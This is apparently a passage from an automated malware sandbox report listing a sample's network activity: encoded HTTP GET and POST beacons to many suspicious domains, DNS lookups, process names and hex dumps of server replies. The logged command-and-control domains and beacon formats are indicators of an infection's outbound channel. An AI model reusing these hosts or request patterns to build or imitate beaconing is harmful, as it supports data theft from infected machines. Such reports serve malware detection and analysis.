8a 57 65 df 85 ab f9 94 99 bd 07 d3 63 0f c2 9f e1 17 f0 d7 93 65 20 04 00 00 Data Ascii: TMo0=/bDJ7JH@*Jsaq6Pc|7o0&ok(oPV M-Uc(r'}EL#q'7;UZ5iCBNe.RF:pXi~CIC/nxHA;bN+g=*k*dwB>jCl=n= x!S&H[m{+*C4jSmZ%*sRadQDn\'p6(#MO7 gcuuN>pJ:k4Yl|bEYM0iCQrllgC? 'av#"h>UZgw+P;wrhcFCL<9_K8G0oI=v1.ERi`URupZABWXN!q^x?)b71x_Wece
            Source: global trafficHTTP traffic detected: GET /v1m8/?Xn70_=MbosJJuAq5eUJ0hPiGjwIN1TLoIAcga9hjG8r0T6YD1U+30HrEc2VhBeVjG8H8kt/NUkGofbq5WDcsdH4YqjssfFBuX2F/io1ZFH4zFtNPAFxgqhGgKh1aBi0mxPguqsni1l53c=&mV=ZpN4DLSXOzy8qX HTTP/1.1Host: www.weep.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /l4rw/?Xn70_=ZXNQqBP58JXIf3ltP6wut8CCjedJLF5l9UucInMS2YFRqgKt0pQ9Lq2gj3LI6pyb9XKzluqnMvvmNnss5NGj4J8VLwdTZn5p64yovrdSdmFXVLBYTbU+6U99coUT9vxRPQh+Kno=&mV=ZpN4DLSXOzy8qX HTTP/1.1Host: www.88nn.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /t3gh/?Xn70_=d/YHbjU0lRTRkwDy0zIPv6PdUN2QowQER5WtK+J3r0U/ADUIPiMSea/+ySZyWjMipb/6l9jjBkeXWJl7BthetgJD5Cj99fT73mV1toZHsOXJ+4nrRaepQcEbq6LCfz7oYbWletg=&mV=ZpN4DLSXOzy8qX HTTP/1.1Host: www.fontanerourgente.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /zctj/?Xn70_=tSuw7IYRRjv+wnLRJKBizfUbw5DKe+pV3SuosHDPhpHVIQ9U3bF8KrgVZ9eofhuzjMlHgMWokK5nneJg1eEhfsOfW9Q7idqDaQ0/bUKrb6lVOs08wJGK3g6GM4oAhkBtSiykhk4=&mV=ZpN4DLSXOzy8qX HTTP/1.1Host: www.onlytradez.clubAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /kyiu/?Xn70_=XDGtsL25HTw6JP64VC7y2QrABH1070ZVn4NdqHGWC1gt1eOjH+BVmk6PIm5PWw2c27Ak8m93WqRL2MBomZszHLGx0l4jqt7JLz8z3pwCpHaPnAKrE0wOd8iQCO012svuMCQv9qI=&mV=ZpN4DLSXOzy8qX HTTP/1.1Host: www.32wxd.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /f9bc/?Xn70_=6SLGUfBvDKizOJgilDQKzMcZwSFGn/Vi7oEe4x7u5mEB7F/p7TzH3kWVQQZ5nrAfRyQgCx35fGtmx6dEsYxPB6ub3CJra4TZEe7JWrBxAEyCa2afTuvzmz4GABagNobpZHqRWtM=&mV=ZpN4DLSXOzy8qX HTTP/1.1Host: www.jaxo.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /647x/?mV=ZpN4DLSXOzy8qX&Xn70_=FnaXBox54+ag7g5huWPEmVuBH/Jm8y343eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUpgzDZpO2xsWAnZCQe5aiqUqIaOEJzM3y652oxbgTObGuSO3B10Kw= HTTP/1.1Host: www.xforum.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /l90v/?Xn70_=65tz+8+CHtIdUwlI5J0Rvcw20Xa7qh/y7kK7USWOBh85j9WcKbCPI7UII3emD6Kks24YSbVOAcNXIRb+3rSlPhO14vaNX6GX5zyvmtdMAZdMTyJ7S8cUtjW2YAh8fb9spiiUzBk=&mV=ZpN4DLSXOzy8qX HTTP/1.1Host: www.cannulafactory.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /rgqx/?Xn70_=k7UoFTYShwNh8X33bnwY0thhVqNwwmygtcywMstwCAmbg7ptW+NBcIDWqO/wkzukyRO00HsnixKpsDOlj0tXpJ/xTrqx42/2gBD027lgSoPVoYuqVtYfG9QcRyu7q583xH9wJHc=&mV=ZpN4DLSXOzy8qX HTTP/1.1Host: www.ayypromo.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /qpwk/?mV=ZpN4DLSXOzy8qX&Xn70_=Pn8OF1j/flre3VeYQ8gIXKcN0tGdbcqXadgaNymjhjlyVvhoWwCe/sZUerDBeXD1/Dp7mYeP8BtJLpf3hF/3m/h5NM1/Dot3Sot4/3V0qZLtTBV8KMhP3aG6aVWI0GSP3d0EJgo= HTTP/1.1Host: www.anaidittrich.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0or4/?Xn70_=Ap9XVhmqGkofKqiV5m9YIo/+mNWQVB3yrZ4yzU5Yy+i7TWDOWZwNJN7AITR5XrxbOYEdZ4fD4Uqd39DYFcK8Ez1yK8yk0Eg6fz4eRdqrvJXc5ChZOexPycZL94MwDpFuqgEtJpY=&mV=ZpN4DLSXOzy8qX HTTP/1.1Host: www.551108k5.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /gs9g/?Xn70_=1tUju/dHge3HLZSdE2k0YsxyInHY2hrxyQikSChTyVI6tApcYR3Jee2z9yFvFCdZtAxjWN4NnVxgCMN8Nn90+uGeV46P8z2dJC38PhOXMX6lRwcpgLQeWu7EugNpVbCb7i9ISyk=&mV=ZpN4DLSXOzy8qX HTTP/1.1Host: www.datensicherung.emailAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /uhl0/?Xn70_=ncGfyjKG78FJ3RohSJv2gscu+FHk/nvAJl3DW65koN/XsollpddV5N2bVVuKdzPyIkh4e3ZVd/UrgbHQf7fI9cbDzTo3eIPvJ/69OYqbKv/aNBrOYFR5SHm/7G6NRslCZscJ8Q0=&mV=ZpN4DLSXOzy8qX HTTP/1.1Host: www.jiyitf.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /7o3y/?mV=ZpN4DLSXOzy8qX&Xn70_=34bWgTnU4AX1gKZpgT03P58mZraF9WQxUDpx7/bRsS0fRbM850xuSZ+vkJ4N+S3djb8r5M9tcI2Ggb3yyq8UwsXUXfif+FOOr40nRowl+nZyE3/KMRkY0oHOpy0tGVDF3Z+R9aA= HTTP/1.1Host: www.tadalaturbo.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <li id="menu-item-19" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-19"><a href="https://www.facebook.com/wordpress"><svg class="svg-icon" width="24" height="24" aria-hidden="true" role="img" focusable="false" width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg"><path d="M12 2C6.5 2 2 6.5 2 12c0 5 3.7 9.1 8.4 9.9v-7H7.9V12h2.5V9.8c0-2.5 1.5-3.9 3.8-3.9 1.1 0 2.2.2 2.2.2v2.5h-1.3c-1.2 0-1.6.8-1.6 1.6V12h2.8l-.4 2.9h-2.3v7C18.3 21.1 22 17 22 12c0-5.5-4.5-10-10-10z"></path></svg><span class="screen-reader-text">Facebook</a></li> equals www.facebook.com (Facebook)
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <li id="menu-item-20" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-20"><a href="https://twitter.com/wordpress"><svg class="svg-icon" width="24" height="24" aria-hidden="true" role="img" focusable="false" width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg"><path d="M22.23,5.924c-0.736,0.326-1.527,0.547-2.357,0.646c0.847-0.508,1.498-1.312,1.804-2.27 c-0.793,0.47-1.671,0.812-2.606,0.996C18.324,4.498,17.257,4,16.077,4c-2.266,0-4.103,1.837-4.103,4.103 c0,0.322,0.036,0.635,0.106,0.935C8.67,8.867,5.647,7.234,3.623,4.751C3.27,5.357,3.067,6.062,3.067,6.814 c0,1.424,0.724,2.679,1.825,3.415c-0.673-0.021-1.305-0.206-1.859-0.513c0,0.017,0,0.034,0,0.052c0,1.988,1.414,3.647,3.292,4.023 c-0.344,0.094-0.707,0.144-1.081,0.144c-0.264,0-0.521-0.026-0.772-0.074c0.522,1.63,2.038,2.816,3.833,2.85 c-1.404,1.1-3.174,1.756-5.096,1.756c-0.331,0-0.658-0.019-0.979-0.057c1.816,1.164,3.973,1 equals www.twitter.com (Twitter)
            Source: global trafficDNS traffic detected: DNS query: www.weep.site
            Source: global trafficDNS traffic detected: DNS query: www.88nn.pro
            Source: global trafficDNS traffic detected: DNS query: www.fontanerourgente.net
            Source: global trafficDNS traffic detected: DNS query: www.onlytradez.club
            Source: global trafficDNS traffic detected: DNS query: www.32wxd.top
            Source: global trafficDNS traffic detected: DNS query: www.jaxo.xyz
            Source: global trafficDNS traffic detected: DNS query: www.xforum.tech
            Source: global trafficDNS traffic detected: DNS query: www.cannulafactory.top
            Source: global trafficDNS traffic detected: DNS query: www.taapbit.online
            Source: global trafficDNS traffic detected: DNS query: www.ayypromo.shop
            Source: global trafficDNS traffic detected: DNS query: www.anaidittrich.com
            Source: global trafficDNS traffic detected: DNS query: www.551108k5.shop
            Source: global trafficDNS traffic detected: DNS query: www.datensicherung.email
            Source: global trafficDNS traffic detected: DNS query: www.jiyitf.top
            Source: global trafficDNS traffic detected: DNS query: www.tadalaturbo.online
            Source: unknownHTTP traffic detected: POST /l4rw/ HTTP/1.1Host: www.88nn.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateOrigin: http://www.88nn.proReferer: http://www.88nn.pro/l4rw/Cache-Control: max-age=0Connection: closeContent-Length: 210Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36Data Raw: 58 6e 37 30 5f 3d 55 56 6c 77 70 32 61 49 39 4a 7a 4c 58 6c 74 31 64 50 34 4e 31 76 6e 2b 34 50 68 78 51 46 55 51 31 78 6e 73 58 47 30 59 2b 2b 4a 68 70 42 2b 50 31 4b 4e 47 55 62 71 33 70 56 37 65 72 4e 69 36 68 30 71 4c 74 2b 4f 6b 48 38 33 55 45 6b 30 48 34 38 57 45 30 2b 6b 52 51 53 34 52 56 6e 4e 43 67 36 53 74 36 6f 49 45 4e 32 52 57 4a 5a 52 5a 54 4e 49 7a 38 6e 5a 41 62 4a 63 77 38 59 78 59 51 41 64 70 42 6a 2b 4e 4c 52 42 61 41 43 4e 46 34 75 34 78 43 30 70 4b 70 72 72 78 2f 79 61 58 6b 69 47 68 4a 53 4e 72 53 36 6b 49 6d 7a 30 76 65 48 56 30 36 2f 46 6b 51 35 62 32 37 73 66 34 66 41 62 42 6d 34 71 53 4c 47 35 4d Data Ascii: Xn70_=UVlwp2aI9JzLXlt1dP4N1vn+4PhxQFUQ1xnsXG0Y++JhpB+P1KNGUbq3pV7erNi6h0qLt+OkH83UEk0H48WE0+kRQS4RVnNCg6St6oIEN2RWJZRZTNIz8nZAbJcw8YxYQAdpBj+NLRBaACNF4u4xC0pKprrx/yaXkiGhJSNrS6kImz0veHV06/FkQ5b27sf4fAbBm4qSLG5M
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 23 Aug 2024 06:25:54 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Connection: closeTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 23 Aug 2024 06:26:10 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "667cd175-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 23 Aug 2024 06:26:12 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "667cd175-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 23 Aug 2024 06:26:15 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "667cd175-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 23 Aug 2024 06:26:17 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "667cd175-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 23 Aug 2024 06:26:23 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 20 64 65 20 6c 6f 73 20 63 6f 6d 65 6e 74 61 72 69 6f 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e
